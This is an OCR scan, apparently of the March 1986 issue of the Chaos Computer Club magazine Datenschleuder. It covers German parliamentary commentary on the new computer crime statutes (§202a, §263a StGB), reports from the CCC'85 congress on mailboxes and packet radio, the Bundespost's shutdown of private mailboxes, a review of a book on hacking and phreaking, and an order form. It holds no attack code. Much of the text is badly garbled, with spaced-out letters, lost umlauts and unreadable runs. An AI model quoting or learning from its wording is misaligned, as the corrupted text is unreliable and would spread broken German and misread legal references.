e r n g e f h r d e t w e r d e n knn e n u n d e i n e z u s t a r k e S y s t e m b e l a s t u n g eintreten k a n n . I n s o w e i t stellt a b e r ein solches V e r h a l t e n erst eine G e f h r d u n g dar, d i e f r den A u s s c h u als A n s a t z p u n k t f r e i n e n n e u e n S t r a f t a t b e s t a n d in d i e s e m B e r e i c h nicht a u s r e i c h t Ist die eingetretene S t r u n g durch das E i n d r i n g e n so stark, da D a t e n ver n d e r t w e r d e n oder die A n l a g e b e s c h d i g t wird, so k n n e n u.U. die 303 bis 303b S t G B eingreifen. In Fllen, in d e n e n d e r T t e r sich nicht m i t dem unbefugten Z u g a n g b e g n g t s o n d e r n d a r b e r h i n a u s D a t e n a b r u f t bleibt 202 a S t G B a n w e n d b a r .

202 ylbs. 3
D i e N e u f a s s u n g ist eine F o l g e n d e r u n g zu d e m T a t b e s t a n d des 202 a S t G B , der d i e b i s h e r von 202 Abs. 3 i . V . m . Abs. 1, 2 g e s c h t z t e n Gedonk e n e r k l r u n g e n i n seinen S c h u t z a u c h einbezieht

Z u A r t i k e l 1 N r . 2 e 205 S t G B Der A u s s c h l u des b e r g a n g s des S t r a f a n t r a g s entspricht der v e r g l e i c h b a r e n R e g e l u n g z u 4 1 Abs. 1 Nr. 2 B D S G (vgl. 77 S t G B ) .

tr

Zu Artikel 1 Nr. 3 -

S 263 a S t G B

8 s

3.

C U

8.

CD

je u

O a

g c

S,

y4bsatr 2
Der A n w e n d u n g s b e r e i c h des T a t b e s t a n d e s w i r d a u f die in A b s a t z 2 g e n a n n t e n D a t e n b e s c h r n k t D a s Ausspionieren von D a t e n ist vor allem dort gefhrlich, w o Daten in groer M e n g e n i c h t sichtb a r , n i c h t l e s b a r oder s o n s t n i c h t u n m i t t e l b a r w a h r n e h m b a r gespeichert w e r d e n . U n m i t t e l b a r w a h r n e h m b a r e D a t e n s i n d u . a . d u r c h d i e 201. 202 S t G B a u s r e i c h e n d g e s c h t z t Z u r Klarstell u n g w i r d d i e E i n b e z i e h u n g von D a t e n , d i e berm i t t e l t w e r d e n , b e s o n d e r s h e r v o r g e h o b e n . Bew u t h a t der A u s s c h u d a v o n a b g e s e h e n , n u r solche D a t e n z u s c h t z e n , die i n e i n e Datenverarb e i t u n g s a n l a g e g e s p e i c h e r t in e i n e solche o d e r aus e i n e r solchen b e r m i t t e l t w e r d e n . V o m ges c h t z t e n R e c h t s g u t h e r k a n n es k e i n e R o l l e spielen, w e l c h e Technologie bei der S p e i c h e r u n g u n d b e r m i t t l u n g von D a t e n v e r w e n d e t w i r d . E i n e N o t w e n d i g k e i t , d e n D a t e n b e g r i f f n h e r zu bestimmen, hat der Ausschu ebensowenig wie seinerzeit b e i E i n f h r u n g des 268 (Absatz 2) S t G B (vgl. d e n A u s s c h u b e r i c h t Drucksache IV/4094, S . 37 u n d die A u s l e g u n g i n d e r L i t e r a t u r ) u n d des 2 Abs. 1 B D S G gesehen. Hervorzuheben i s t d a s e l b s t v e r s t n d l i c h a u c h gespeicherte P r o g r a m m e erfat w e r d e n .

Der A u s s c h u h l t d e n Vorschlag der E n t w r f e , ein e n g e s o n d e r t e n T a t b e s t a n d des Computerbetruges" e i n z u f h r e n f r sachgerecht u n d h a t i h n m i t e i n i g e n n i c h t u n w e s e n t l i c h e n n d e r u n g e n bern o m m e n . A u c h w e n n es i n d e r Strafverfolgungspraxis bisher n i c h t z u s p e k t a k u l r e n E i n s t e l l u n g e n oder F r e i s p r a c h e n g e k o m m e n i s t so ist d e r Auss c h u aus d e n i m R e g i e r u n g s e n t w u r f g e n a n n t e n G r n d e n v o n der N o t w e n d i g k e i t , e i n e b e s t e h e n d e S t r a f r e c h t s l c k e z u schlieen, b e r z e u g t I n d i e s e m P u n k t e s t i m m e n auch smtliche Sachverstndige bei der f f e n t l i c h e n A n h r u n g b e r e i n (vgl. P r o t Nr. 26 S. 164, 175f.. 179, 181 f., 185f., 188: A n l . S.35, 41 f., 150, 201, 218, 255f.). I n F o r t s e t z u n g der grundstzlichen Linie der S t r a f r e c h t s r e f o r m , spezifische M n g e l u n d L c k e n klassischer S t r a f t a t b e s t n d e (263, 266, 267 S t G B ) n i c h t d u r c h n d e r u n g u n d E r g n z u n g dieser T a t b e s t n d e , s o n d e r n d u r c h erg n z e n d e n e u e T a t b e s t n d e z u b e h e b e n , h a t sich der A u s s c h u d a f r entschieden, an d e r E i n f h r u n g eines S o n d e r t a t b e s t a n d e s f e s t z u h a l t e n . Er s i e h t sich d a m i t i n b e r e i n s t i m m u n g m i t d e r E m p f e h l u n g der S a c h v e r s t n d i g e n k o m m i s s i o n z u r Bek m p f u n g der W i r t s c h a f t s k r i m i n a l i t t u n d m i t ausl n d i s c h e n R e g e l u n g e n (z. B. in D n e m a r k ) u n d Ref o r m e n t w r f e n ( z . B . in s t e r r e i c h u n d i n d e r Schweiz). D e m Vorschlag von H a f t u n d Sieber i n der ffentlichen A n h r u n g ( P r o t S. 164, 168, 175 f., A n l . S. 201, 205 f , 250 ff.), sich m i t einer bloen Erg n z u n g d e s 263 S t G B zu begngen, ist der Ausschu n i c h t gefolgt H a f t ( P r o t S. 164 ff A n l . S. 201 ff.) sieht ein Bedrfnis zur E r g n z u n g des 253 S t G B n u r hinsichtlich des Irrtums"-Merkm a l s , weswegen er die F a s s u n g der E n t w r f e , d i e die Parallele zur T a t h a n d l u n g , z u m I r r t u m s m e r k m a l u n d z u m ungeschriebenen T a t b e s t a n d s e l e m e n t der V e r m g e n s v e r f g u n g b e i m Betrugstatbest&nd verlassen w r d e n , a b l e h n t E r h a t d a h e r vorgeschlagen, 263 S t G B nur u m einen Satz zu e r g n z e n , der d e m I r r t u m i . S . des 263 die F e h l i n f o r m a t i o n des Computers gleichstellt Sieber ( P r o t S. 175 ff 256 ff.) hat vorgeschlagen, den in 263 S t G B gen a n n t e n T a t h a n d l u n g e n die u n r i c h t i g e oder flschliche Beeinflussung eines a u t o m a t i s c h e n Datenverarbeitungsvorganges bzw. einer Datenverarbeit u n g s a n l a g e oder noch a l l g e m e i n e r eines technischen Gerts, w e n n das D a t e n v e r a r b e i t u n g s s y s t e m auch K o n trollzwecken dient bzw. bei dessen Einsatz K o n t r o l l e n erfolgen, gleichzustellen.

Seite

Seite

aten3d)lcuber
Der Ausschu spricht sich d a f r aus, die allgemeine Struktur des 263 S t G B i m R a h m e n dieses Gesetzes unangetastet zu lassen. Der Betrugstatbestand ist eine allgemeine Vorschrift z u m Schutze des Vermgens gegen einen bestimmten Angriff, n m l i c h die dort g e n a n n t e n T u s c h u n g s h a n d l u n g e n in Bereicherungsabsicht Gegen andere Angriffe auf das Vermgen gibt es jeweils spezielle Vorschriften (vgl. als allgemeine Regelung z . B . 260 S t G B ) . Der Computerbetrug stellt eine neue Manipulations* form zum Nachteil des Vermgens dar, die sich gerade dadurch auszeichnet, d a ein Mensch nicht getuscht u n d zu einer v e r m g e n s s c h d i g e n d e n Vermgensverfgung veranlat wird. Deswegen h a t der Ausschu auch von der Alternative abgesehen, den Computerbetrug in einem neuen A b s a t z 2 des 263 S t G B zu erfassen. Computerbetrgereien weisen Besonderheiten auf, die einen eigenen Tatbestand auch m i t einer vom Betrug teilweise abweichenden Ausgestaltung rechtfertigen. Gegen den Vorschlag von H a f t h a t der Ausschu u . a . auch deswegen Bedenken, weil auch andere M e r k m a l e des Betruges (Vorspiegelung", Erregen" oder Unterhalten" eines Irrturps; ungeschriebenes M e r k m a l der Vermgens Verfgung) personenbezogen zu verstehen sind u n d es d a h e r nicht ausreicht, n u r bei dem M e r k m a l des I r r t u m s eine Gleichstellung vorzunehmen. D e r Vorschlag von Sieber ist im Hinblick auf seine n o c h z u unscharfe Fassung nicht bedenkenfrei. Seine E r w g u n g , einen Strafrechtsschutz nur gegen M a n i p u l a t i o n e n an sicher heitskontrollierten A n l a g e n vorzusehen, w r d e d e n Tatbestand zu sehr einschrnken. D u r c h H e r v o r h e b u n g verschiedener Tatmodalitten, die sich a n empirischen Erscheinungsformen u n d an der Eigenart vermgensschdigender Comp u t e r m a n i p u l a t i o n e n orientieren, wird der Gefahr einer zu weiten A u s d e h n u n g des Tatbestandes vorgebeugt. D i e e r g n z t e F a s s u n g des A b s a t z e s 1 hebt wie i n d e n E n t w r f e n die T a t h a n d l u n g e n der besonders g e f h r l i c h e n sog. P r o g r a m m a n i p u l a t i o n (unrichtige G e s t a l t u n g des P r o g r a m m s " ) u n d der I n p u t m a n i p u l a t i o n ( V e r w e n d u n g u n r i c h t i g e r oder unvolls t n d i g e r Daten"), w e l c h e d i e P r o g r a m manipulation a n sich a u c h m i t u m f a t ( P r o g r a m m e sind eine besondere A r t von D a t e n ) , b e s o n d e r s hervor. V o n einer V e r w e i s u n g auf den D a t e n b e g r i f f des 202 a A b s . 2 S t G B wurde abgesehen, d a 2 6 3 a S t G B gerade a u c h Flle erfat, in d e n e n n i c h t an bereits gespeicherten D a t e n M a n i p u l a t i o n e n begangen, s o n d e r n diese erst e i n g e g e b e n w e r d e n . N a c h d e m in der W i s s e n s c h a f t u n d i n d e r ffentlic h e n A n h r u n g von m e h r e r e n S a c h v e r s t n d i g e n ( H a f t Oertel, L e h n h o f f [Zentraler K r e d i t a u s s c h u ) , B r e n t r u p f G e s a r a t v e r b a n d d e r D e u t s c h e n Versicher u n g s w i r t s c h a f t j , P r o t Nr. 26, S. 167. 181, 184 f f . 188, A n l . S. 35,41 f . 150,206.215 ff.) Z w e i f e l g e u e r t word e n w a r e n , ob m i t der A l t e r n a t i v e d e r u n r i c h t i g e n V e r w e n d u n g von D a t e n " a u c h d e r F a l l e r f a t werd e n k a n n , d a j e m a n d z. B. u n b e f u g t f r e m d e C o d e n u m m e r n bei m i b r u c h l i c h e m G e b r a u c h eines G e l d a u t o m a t e n oder j e m a n d u n b e f u g t e i n e n fremd e n A n s c h l u a n das B i l d s c h i r m t e x t s y s t e m b e n u t z t h a t der A u s s c h u eine e r g n z e n d e K l a r s t e l l u n g ins o w e i t fr n o t w e n d i g e r a c h t e t die auch v o m Innena u s s c h u gebilligt w u r d e u n d e i n e r Prfungsanreg u n g des F i n a n z a u s s c h u s s e s e n t s p r i c h t Der in der

15 = M r z

1986

W i s s e n s c h a f t l i c h e s F a c h b l a t t fr D a t e n r e i s e n d e Herausgegeben vom Chaos C o m p u t e r Club

Wissenschaft umstrittene Ausweg, die 242, 246 S t G B anzuwenden, den teilweise Instanzgerichte bei M i b r u c h e n m i t B a n k o m a t k a r t e n a n Bargelda u t o m a t e n beschritten haben, steht bei einer mibruchlichen B e n u t z u n g des Btx-Systems, die zu vermgensschdigenden V e r f g u n g e n fhrt, nicht zu Verfgung. Von Sieber ( P r o t Nr. 26 Anl. S.257) w u r d e n Bedenk e n g e u e r t die F a s s u n g der E n t w r f e k n n e eventuell dazu fhren, da neue Manipulationstechniken (z.B. b e s t i m m t e H a r d w a r e - M a n i p u l a t i o n e n ) nicht erfat wrden. Der Ausschu h a t diese Bedenken aufgegriffen u n d den Tatbestand in Anlehn u n g an den sterreichischen E n t w u r f u m die Alternative der unbefugten E i n w i r k u n g a u f d e n Abl a u f ' des zuvor genannten Datenverarbeitungsvorgangs e r g n z t Die in den R e g i e r u n g s e n t w r f e n erfate E i n w i r k u n g " auf den P r o g r a m m a b l a u f " wurde dadurch, weil v e r a l l g e m e i n e r t berflssig. Was die vom Tter mittels einer oder m e h r e r e r Tatmodalitten herbeigefhrten u n d gewollten Folgen betrifft so h a t sich im brigen a u f g r u n d der parallelen Ausgestaltung zu 263 S t G B die A u s l e g u n g des 263a S t G B z u dessen E i n g r e n z u n g an der Auslegung des 263 S t G B zu orientieren, wie dies n h e r im Regierungsentwurf a u s g e f h r t i s t D a d u r c h kann eine unntige zu weite A n w e n d u n g des Tatbestandes verhindert werden. Im Hinblick a u f entsprechende E r r t e r u n g e n i m Finanzausschu wird noch d a r a u f hingewiesen, da soweit 370 A O dem Betrugstatbestand v o r g e h t dies auch im Verhltnis zu 263a S t G B g i l t v4bsali 2 wurde u n v e r n d e r t b e r n o m m e n .

Datenschutz war die Spekhemng wo Bsteiler-und flboneUWatn der B.H.P. i>d Bei uns wird ber Netzwerke geredet in Amerika Alternativen zum Computer, wie R i c k f i D hl die werden sie benutzt U m ber ihre Erfahrungen zu berichten, waren eifern einige Teilnehmer des Karteikastenzeit ( w i i n U m s a a oder vorbereiamerikanischen Netzwerk "DelphiNet" ange- tete Umschlge fr jeden Abonnenten (Beispiel Handbuch f- H ackar) lahall b*$er Diskussioreist Sie benuben das Netzwerk fr OrrLine- nen. Wer eine Diskette dabei hatte, konnte sich Konlerenzen und als elektronische Zeitung. An- im Hack-Center fleicb die B.H.P.-F reeware abwendungsbeispieh Bei einer USA-weiten Anti- liehen. Ein U l R U S - f r o g n m m A o i u e p l f r d e n Apartheits-Demonstration fand man die aktueD- C-64 entwickelt Oiehei) und die Zusammenarsten Infos im "Delphinet". W a n n wowiedemon- beit zwischen B.H.P. und anderen Gruppen striertwurde, konnte man berdas Netz abrufen. ( C A C j G I ' s atc.) abgesprochen, -On-Line-Konferenzen zwischen den lokalen bhp.ws 851228 05:U7e Koordinatoren sorgten fr aufeinander abgestimmte Aktionen. Nach Aussagen der Amerikaner sind Computer-Konferenzen gegenber Telefon-K onf erenzen a) billiger (ca. ein Viertel der Kosten) b) effek tiverd. ersucht nicht jeder dweh lautes Brllen das U ort an sich zu reien, 2. kann man A.U.G.E. nochmals nachlesen, was kurz zuvor gesagt wur- Am Samstag 15.00 Uhr fand ein Treffen w n de (ist ja noch auf dem Schirm) 3. reden nicht S u s C y der lokalen Mailboxen frmerhalb der alle durcheinander). Auerdem kann das A U G E (Apple User Group E u r o ) statt. Z Konferenz-Protokoll anschlieend ausgedruckt nehsl wurde der aktuelle Zustand beschrieben: und an Nicht-Teilnehmer verleih werden, eine zentrale Datex-P Mailbox innerhalb von delphlws 851228 03:30e IM CA (Geonet) und lokale M ailboxen in Frankfurt, Oberhuten, M annheim, H a m b o r g , D a r m stadt und Kln. In Zukunft soll an ein Infermatbnsaustavsch zwischen allen lokalen Mailboxen stattfinden. Er wird sofort iiber einzelne User der IM C A verwrkHcht Ein echtes Intermailing toll spter in Zusammenarbeit mit andere Boxen entstehen, Die Koordination dieser Akthritate luft ber die Regnalgruppe Hamburg. auge.ws 851228 OfJHe

TATEN MIT DATEN

Juristische Fachseiten zur Datenschleuder 15 A u f diesmal vier Seifen umfassende und aktuelle I n f o r m a t i o n zu den neuen C o m p u t e r k r i m i n a l i t t s g e s e t z e n . A u s z g e aus Erlut e r u n g e n u n d den D e b a t t e n sind mit freundlicher G e n e h m i g u n g des Verlages Dr. Heger, PF 2 0 0 8 2 1 , 5 3 Bonn 2, a b g e d r u c k t . W e i t e r e r u n d 1000 Seiten zum Thema sind im Redaktionsarchiv zu finden. _ u r h o k l 5.ws 860323 2025 S e i t e 1 0

Auch in die fr) ftht wurde <ftr CCC Mof dtm KKK von der B.H.P. h (= heimgesucht). Der Beratungssland fr den lebensbejahenden D F Benutzer war ein voller Erfol. Nicht nur, da die vereinkte Hackertchaft uns unseren allen Mll aus den Hnden riss - nein, auch inen neuen Rekord gab es zu vermelden: N u r H Tage nach der Auslieferung der B.H.P. Nr.fi erblickte mit nur 6 Tagen Tragzeit die B.H.P. Nr.7 das Lichtder W elf. Das serienmige Klonen erfolgte dann mit dem Kopierer im (chaotischen) Archiu. U ohlgemarkt, s handelt sich hierbei um K E I N E Behelfs-oder Sonderausgabe, sondern eine ganz normale fi.H.P.. Am Stand wurden zeitweise hei sakrale Themen, wie der Zusammenhang (wischen redaktionellem Weibierkoraum und Erscheinungsweise der B.H.P. diskutiert, als auch weltliche Dinge, so das Daten-Ver-und EnlschIiitselumsverfahren D E S (Data Encryption Standard) der NAS (National Security flgency) besprochen. Im Zusammenhang mit dem immer aktuellen

Hund samma scho

MPRES5UM
Informationsblatt zum Chaos CommuniJcation Congress Pressestelle des CCC'85 Druck: Eigendrack im Selbstverlag Redaktion: Medienworkshop des C C C 8 S Mitarbeitende Redaktionen: Datenschleuder Die Bayrische Hackerpost Genelhischer Informationsdienst C-64 Anwender Chib u.a. U.LS.d.Pj Herwart HoOand-MoriU Schwenckestr.85 2000 Hamburg 20 Impress.ws 851228+-.S6e

" C o a p u t o i n d i e H a i d des V o l k e s " , d a s o a i ( 1S7( H t k a b r t r o i u f i c B r r S a t z . I S 8 5 I i i der Htiiuia)uhraul(t kst j m l i j l

F r e i h e i t is t l e r n b a r

MAILBOXEN SIND NICHT TOTZUKRIEGEN


auch w e n n die Posi es versucht

Die einen wissen war, wie d e mit der Computertechnik Herrtchaft absichern und erweitem knnen, ndert d i f t t e n empfinden erhabene Gefhle, wenn es nach Monaten f e I i n j t , M Utters Haushaltskasse auf dem C'64 zu implementieren. Uber allem wabert ein irrealer Computermythoi - er umiibt selbst denjeniien, der nur vorjibt, etwas von ihr zu verstehen, mit der Dura des Erleuchteten Ist die A n i s t vor dem Computer ein EriiehunjsmHtr] fr Hasscnfesellschaften? Also, "wenn ihr nichl artig seid, holleuch d u jroe schwarze L u f t i g e D a t e n m i t P o c k e t R a d i o ComvuterunjeheueH" S t n d i j umlajert war die Funkmailbox D L 0 Auf dem CCC'85 wurde deufch, da die Ver- CCC-1 auf dem C C C 8 S . M H 1200 Baud macht sie " D a t o ; " im Luftverkehr. Die benutzte Norm netzunf von Mikrocomputern die Perspektive einer lokal autonomen Gesellschaft durch kikal fet A X 2 5 , die Amateurfunkversion von X.25. autonome Technik in sich b r j t Aber die N e b e M i t ihr kann jeder Funkamateur weltweil adresentliehen in den Kpfen der M entchen - sie ihid siert werden. Beider Postnorm X.25 knnen die ein W fllensakt - keine Fraje technischer Reali- DaUnpckchen an hchstens 256 Empfnjer sierbarkeit. Ohne soziale Zusammenhat)] e, ohne adressiert werden. UbertntfuTijsfehler werden femeinsame Interessen und Ziele wird ein alter- wie bei Datex X.25 erkannt. Auf H 4 7 S M H z war die luftise Box wahrend des CCC'85 fast native] Computemetz tum Btx degenerieren. Untere Netze brauchen "seltsame , konsequent stndij in Betrieb. subjektive und poetische Informationen - ein Einfesetzt werden auer "Pockercomputern spannender und menschlicher Kontrast zu b- mit nsejchlotjcnem 7911-Modem und Handhinke etliche C64er mit w ild anj ebiuter Technik rokratischen Datennetzen. Deutsche Hacker, Dichter, Denker, Jede philo- sowie die blichen Sonderaufbauten. Als Standard existieren Komolettlsunjen fr CPM p h k e h t Schule ist seil dem Altertum auch immer eine Denkformatierunf fewesen. Unsere Kisten und C64er als laufende Prolotupen Die F ormatienmien sind rein technischer Natur. D ie Platinen werden j e j e n w r t i j in Hamburg entGedanken im Netz sind frei Freiheit ist lernbar. flochten. Neben dem UK W -Betrieb j i b l es auch Die Freiheit, die wir anbieten, ist die des Infor- weitreichende Datenverbindunjen auf Kurzwelmallonswtrtes. Eine leidenschaftlich estellte le; oft in 300 Baud. Fraj ist so labern wart vi* eine vwblndliche Ein Besucher aus den USA sleDte eine DatenAntwort funkverbindun; ber Kurzwelle zwischen USA In diesem Sinne verstehen wir auch Schuluni- und Nicaraiua vor: die Tekfonuerbindunien sprojramme fr Netzwerken Nachbarschaftshil- sind zu unzuverlssig Is5 paeketl5.ws 851228 2209 fe im flobalen Dorf statt Schuk der Nation. Praktisch: der Anbieter eines Schulunisprorammts wei, da eine Schler heute schon essere Lbtunten rinden knnen. Die Aujjabe des Netzwerkers ist, sein Wissen und seine Technik anderen Nicht-ComputerEri Video ber den Kongre u r d vom StadtFachleulen weiter zu feien. Nur so lat sich der jountal erstellt und ist ber (be-)herrschende Camputermutho: auflsen. stadtjournal hambury rulschbahn 17 Niemand toll seinen Computer kssen. Netzuer ' 2000 hambur 13 ke sind menschlich, teL040/B6279 fr ca. 30.-zu bestellen. oiedien.ws 8S1228

An olle User, Hacker, Cracker und DFO-Interessierten... Es geht um Eure Boxen und die neusten Aktivitten der Deutschen BundesPOST! W a r die Datenfernbertragung (DFG) noch bis vor kurzem das Privileg von Firmen, Wissenschoflern, Staatsorganen und einer finanziell begterten Minderheil, hol sich dies im Laute der letzten Jahre dank stark gefallener Hord- und Software-Preise mit verbesserten Gerten und deren zunehmender Verbreitung stark gendert! Vor ca. 2 Jahren kamen bei uns elektronische Briefksten fr JEDERMANN die ersten Mailboxen ouf. Es werden stndig mehr. Zumeist war Enthusiasmus und Liebe zum Hobby sowie die trichte Idee, Gebhren zu sparen, der Anla, SysOp zu werden und so ein Medium in die Dotenwelt 2u stellen. . . Verdienen tut daran nur die Post; der Betreiber mu stndig investieren und die Anrufer vertelefonieren. ca. 2-3000 DM pro Monat. Da diese Mailboxen, wie unaufwendig sie auch immer sind, Kosten verursacher und wir keine Millionre sind, mute der bentigte Rechner verbreitet, preiswert und flexibel sein wie der Commodore C- 64 (. . .auch wenn einige anderer Meinung sind)! Deshalb laufen in Deutschland etwa 90% der ca. 200 privaten Boxen auf C-64 mit 1541 Floppy. Nun kommt des 'Bonner Pudels Kern': Der 64.er besitzt zwar eine Funkstr-FTZ-Nummer, aber nur eine serielle TTL-Schnittstelle. Das Btx-Modem DBT03 pat mit einer Vierdrahtverbindung an den C64. Erlaubt ist das aber erst nach der neuen TKO ca. 1988. Die vormals karjerlich-japanische Post hat den Sprung zu Telekrotie schneller geschaft. Seit rund einem Jahr darf an japanische Postdosen so ziemlich alles angeschlossen werden. Hauptsache, es geht nichts kaputt. Hier wird es, wie unser Postminister auf der Intermedia85 vortrug, noch Jahre dauern. Man htte gerode erst neue Untersuchungen in Auftrag gegeben. Solange bemhe sich die Post um Flexibilitt in der erwarteten Richtung. Der juristisch korrekte Abstand zwischen DIN-Stecker und der hoheitlichen Anschludose im ISDN-Format (das einzige, was von Btx bleibt) ist deshalb in Jahren der Toleranz bis zur Freigabe zu bemessen. Solange liegt der Stecker aus Sicherheitsgrnden mahnend daneben. Viele der neuern Postmodems (nicht nur das DBT03) haben keine ordnungsgemsse V24 (RS232-C) Schnittstelle. Damit ergeben sich Unwgbarkeiten bei der POSTalischen Zulassung der FTZ-Numtner. Das ist diese total unumgngliche Prfnummer fr so hochtechnische Gerte wie z.B. eine Telefonsteckdose usw.. Ein FTZ-geprfter Kopplerdarf an eben diesem Rechner betrieben werden (Grund: der Rechner wrde bei Fehlfunktion nur den Koppler, nicht aber das Welttelefonnetz zerstren) man muss nur 24 Std. tglich neben seinem Rechner sitzen und auf Telefonanrufe der User lauern, dann blitzschnell den Hrer hochreissen und ihn geschickt in die dafr vorgesehenen Gummimuffen des Koppler bugsieren... M i t mehr oder minder schlechter Obertragungsqualitt kann dann der Dotentransfer durch die modernen POSTIeitungsnetze (teilweise nach vor 1938 verlegt) beginnen. Nun hatten einige dieser Mailbox- Betreiber ober noch einigen Togen und Nchten des unermdlichen .Durchwachens am Rechner den Wunsch nach Abhilfe! Besonders findige Kpfe bauten kranartige Gebilde, die abenteuerliche Hebemecbonismen in Betrieb setzen, die die Arbeil des Hrer Abhebens usw. mehr oder weniger geschickt ausfhren. . ,

Im Laufe der Zeit drang die Kunde von einem sogenannten Modem an die SysOp-Ohren. So ein Gert ermglichte neben dem Abnehmen eine wesentlich bessere Dctensicherheit! Also, nichts einfacher als das besorgen wir uns so ein Modem. Aber, oh Schreck, man gibt uns keins, denn unser Rechner hat doch keine FTZ- Nummer (pltzlich braucht er die nmlich)!?! Ironie des Schicksals: die meisten FTZ-geprften Koppler arbeiten auch mit RS232-Pege!n. Nun gibt es jo aber gottlob immer noch ein paar Stellen, die hnliches ( manche behaupten sogar besseres) wie die POST anbieten.. , Das Zauberwort hiess DATENKLO. Das Datenklo (oder hnliches) konnte genau das was ein POSTmodem auszeichnete und noch ein bichen mehr. Gesagt gekauft installiert. Von nun an kloppte das mailboxen in Stadt und Land ganz gut und die POST konnte stndig wachsene Gebhreneinnahmen verbuchen. Alle waren zufrieden bisher!!! Das scheint sich allerdings nun schlagartig zu ndern! Urpltzlich sprengen diese Mailboxen angeblich die POSTeigenen Gertschaften offensichtlich reihenweise... Der C-64 muss sich zu einer Art SS-20 in der Datentechnik gemausert haben und ein Datenklo scheint es in seiner Wirkung mit Hiroshima aufzunehmen. Die Schden im POSTalischen Kabelwold mssen verheerend sein!

M a i l t o x i o f W a r e , die zu einem jroen Teil den IM CA/Geonet-Befehksatz verwendet und in Turbo schrieben ist, ist zur Zeit im AppleFormat (35 o, 80 Track) erhltlich. 140 KB Sourcelcxt fr 75.-. Infos unter 06151/784158 von 01 - 1 9 Uhr. schnipse-ws SS 122805:33e S e i t e 12

nes Stck Freiheit und Freizeit und verbreiten siehe eher wie ein
Virus mit West/Ost-Geflle! hCW/85 Sy/RAMses

Denn in jngster Zeit tauchen bei allen mglichen Mailbox-Betreibern Bedienstete von Herrn Schworz- Schilling ouf und nehmen unter Bezug auf die gltige Fernmelde-Anlogen- Verordnung (sie hier zu zitieren wrde mehrere KByte Speicherplatz kosten) eben diese Boxen ausser Betrieb! Letztes Beispiel: M.C.S. Hamburg, eine der ltesten Boxen in Deutschland berhaupt. Hanglt es sich doch um eigenmchtige Eingriffe und Vernderungen POSTeigener A p p a r a t e . . . (Remark; Wer also sein Telefon mit einem nicht FTZ-geprften Aufkleber versehen sollte macht sich nach Angaben vieler Postler strafbar xx) Die Kunde von solchem Handeln der Behrde oder war es doch nur ein Dienstleistungs-Unternehmen, kommt nun aus allen Teilen der Republik in rapide steigender Zahl. Der nette Vorschlag der Beamten zur Abhilfe lautet ungefhr so: "Schicken Sie doch einfach Ihren Rechner nebst einer nach unseren Richtlinien gebauten RS 232-C Schnittstelle zur Ein2elabnahme an die FTZ- Vergabestelle nach Stuttgart. Dort stellt man dann schnellstens nach ca. 6 bis 9 monatiger Prfung und gegen eine geringe Gebhr eventuell eine Einzelgenehmigung zum Betrieb mit einem bei uns gegen Gebhr leihbaren POSTmodem (DM 80,- /monatl.) aus! Eventuell ist dieses Modem dann sogar vorrtig!" Wirklich sehr hilfreich oder??? W i r fragen nun Euch, die User, Hocker und Datenreisenden, muss das so sein und ist das wirklich olles richtig so!?! Kaum gibt es ein neues (im Ausland schon lange vorhandenes) Medium, so fhlen sich offensichtlich auch schon wieder einige hhrer Beamte um ihr Monopol betrogen. Es gibt ja schliesslich auch noch TELEBOX von der DBP, fr gewerbliche Anwender geplant. Leute die aus Spass an der Sache und ohne Kosten fr andere Ideen verwirklichen sind dort aber auch nicht gefragt. Einige frchten MSSEN DIE MEHLBOXEN SO SCHNELL SCHON WIEDER STERBEN? Aber die Mehlboxen sind ein klei-

Seite

13

me!boxl5.ws 860323

D a t e n s c h 1 e u d e r

Buchbesprechungen

1 5

M r z

1 9 8 6

Fnr b l a l l T E X 1 / L F. H 1 F L L . U S R032, i g l t i g hi', t r s r h o i h e n B e i B p d r j r f I t d ] C " - , - n r m h I t t- f nl\c-ilci|i : e r h , - r .

d-il 6

The C o m p u t e r U n d e r g r o u n d
The Computer Underground. Computer Hacking, Crashing, Pirating ond Phreaking by M. Harry. LOOMPANICS UNLIMITED, der Verlag fr kontroverse und unbliche Bcher mit Widmung an das zweite Hauptgesetz der Thermodynamik hat ein neues Buch herausgebracht. Zwischen Widmung "Dedicated To: G. Jones. Thanks for all the times you bailed me out" und Quellenhinweisen eine Flle von Information. Noch der Introduction finden sich die Kapitel Underground Basics, The electronic information grid, Software Piracy, Phreaking, Security agoinst Computer Espionage, Defeating Computer Security, Hacking Networks, BBS'ing: Using the Boords bis zur Conclusion. Im Anhang Telephony, Computer Hocking, Programme und Nummern. Umfang hackerbibelartig, aber schlicht schwarz wei. ISBN 0-915 179 31-6. Preis bei der flfl^^ft hackerbibelhnlich bei ca. 8 Wachen W a r t e z e i t . ^ ^ ^ ^ ^ ^ ^

Redaktion

Datenschleuder

* Schwenkestrae

85

2000

Hamburg

20

Rechnung

(nur

mit. Si e g e i > / D e s t e l I f e t z e n

Hamburg ,

!:'n

I: t o r n p o I d a t u m

H i e r m i t w i r d u m t-r-fllung d e r i m f o l g e n d e n - t h^ I . .-Ii i rf,!-! i < sner' - l l e r t er j f l e t z t l i c h t i r i b e r e c h e n b r e n W u nS c h e r l g e b e t e n . B e i t r g e zur Frderung d e s C C C ccc vw A u f 1 , iiT.L'CM/b i.ihr 1 l ei n m a 1 i g . V e r w a l t u n g > 2 0 , 0 0 DM g e w n s c h t e Lei t s t el 1 e n n U m m e r : (> ) cccFf ab 2 3 0 r>M Fordernde'!. M i t g l i e d b i s 2 8 . 2 . B 7 ccc N 1 1 2(3 , M DM Normales Mitglied bis 23.2.07 c c c St 6 0 , 0 0 DM Schler u.a. bis 2 8 . 2 . 8 7 ccc SB 3 0 , 0 0 DM Schuler u.a. bis 3 1 . 0 . 8 6 n a t u r g e m portofrei und u n v e r p a c k b a r Charit.--Jahr endet: mi t Schalt, l ag o d e r nicM L in c n a 3 -I n (J dsPE dsLl dsFl dsNI dsSl dsHO 2,50 999,99 ab 100 60, 00 30,00 60,00 DM DM DM DM DM DM F'robee:-:empl. a r cls-aktuel 1 Ein A b o bringt Unbekanntem fteri L e h e n s a b o r [ ( w e r o d e r w,'^ l e b t l a n g e r ? ) Frirderabo S A u s g a b e n C1 J a h r ) J a h r e s a h o S A. Norma3.vf?rdienGr S o n d e r a b o 8 O. NUR Schler u.a.!!! S o n d e r a b o und H a c k e r b i b e l Teil 1 d s P E - d s H 0 jeweils inkl. Porto/Verp. Hackertiibel Teil 1 je 10 K l e b e r CCC K a b e l s a l a t spriwasge. 1 Kleber Chaos Cnoten nasser f est 64 K l e b e r A c h t u n g Abhrge-Fahr A 4 (letztere sind z.Z. nicht l i e f e r b a r ) p r o S t c k F o t o k o p i e n a u s dem A r c h i v laut beiliegender Liste (nur Fr Redakteure). , , Summe: , P o r t o und V e r p a c k u n g H a c k e r b i b e l P o r t 